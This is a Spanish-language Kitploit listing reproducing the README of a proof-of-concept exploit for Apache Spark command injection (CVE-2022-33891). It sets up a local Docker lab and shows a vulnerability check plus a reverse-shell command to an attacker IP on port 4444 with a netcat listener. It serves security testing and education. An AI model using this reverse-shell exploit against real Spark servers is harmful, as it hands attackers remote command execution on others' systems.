Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2022-33891 — Exploit de prueba de concepto para la inyección de comandos en Apache Spark (CVE-2022-33891) con modos de verificación y reverse shell, que permite pruebas de seguridad autorizadas. | Kitploit
Herramientas/GitHubGitHub/asepsaepdin/cve-2022-33891
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónComando y ControlAprendizaje y Educación
GitHubasepsaepdin/cve-2022-33891

CVE-2022-33891

Exploit de prueba de concepto para la inyección de comandos en Apache Spark (CVE-2022-33891) con modos de verificación y reverse shell, que permite pruebas de seguridad autorizadas.

Ver Repositorio
2hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2022-33891 - Vulnerabilidad de Inyección de Comandos en Apache Spark

Python


⚠️ Solo con fines educativos y de investigación de seguridad autorizada

Autores del Exploit Original

Muy agradecido al autor original del PoC AkbarTrilaksana

Descripción

La interfaz de usuario de Apache Spark ofrece la posibilidad de habilitar ACLs mediante la opción de configuración spark.acls.enable. Con un filtro de autenticación, esto verifica si un usuario tiene permisos de acceso para ver o modificar la aplicación. Si las ACLs están habilitadas, una ruta de código en HttpSecurityFilter puede permitir a alguien realizar suplantación de identidad proporcionando un nombre de usuario arbitrario. Un usuario malintencionado podría entonces alcanzar una función de verificación de permisos que eventualmente construirá un comando de shell Unix basado en su entrada y lo ejecutará. Esto resultará en una ejecución arbitraria de comandos de shell como el usuario bajo el cual se está ejecutando Spark. Esto afecta a las versiones de Apache Spark 3.0.3 y anteriores, versiones 3.1.1 a 3.1.2, y versiones 3.2.0 a 3.2.1.


Guías de Pasos

  1. Primero, clona el repositorio

    root@kitploit:~
    git clone https://github.com/asepsaepdin/CVE-2022-33891.git
    
  2. Cambia de directorio

    root@kitploit:~
    cd CVE-2022-33891
    
  3. Instala las dependencias:

    root@kitploit:~
    pip3 install -r requirements.txt --break-system-packages
    
  4. Deja que el contenedor se inicie

    root@kitploit:~
    docker compose up
    
  5. En una nueva terminal, ejecuta el comando

    root@kitploit:~
    docker exec -it CVE-2022-33891-spark-1 /bin/bash
    
  6. En la sesión bash del contenedor, introduce:

    root@kitploit:~
    echo "spark.acls.enable       true" >> conf/spark-defaults.conf
    
  7. Opcionalmente, muestra el contenido de spark-defaults.conf con cat para asegurarte de que se vea bien.

  8. Sal de la shell bash interactiva y presiona Ctl-C para detener el proceso de docker-compose.

  9. Una vez que los contenedores se hayan apagado correctamente, vuelve a ejecutar docker-compose up

    root@kitploit:~
    docker compose up
    
  10. Verifica si el objetivo es vulnerable:

    root@kitploit:~
    python3 poc.py -u http://localhost -p 8080 --check
    
  11. Desde la perspectiva de un atacante, la ejecución remota de código es crítica para obtener acceso a una shell interactiva. Por lo tanto, ejecutar el siguiente comando desencadenaría una shell inversa telnet sobre TCP basada en bash hacia el sistema del atacante en el puerto 4444/tcp:

    root@kitploit:~
    python3 poc.py -u http://localhost -p 8080 --revshell -lh 172.16.10.24 -lp 4444
    
    root@kitploit:~
    nc -nlvp 4444
    

Créditos

  • https://github.com/AkbarTrilaksana/cve-2022-33891
  • https://nvd.nist.gov/vuln/detail/cve-2022-33891
Descargar herramienta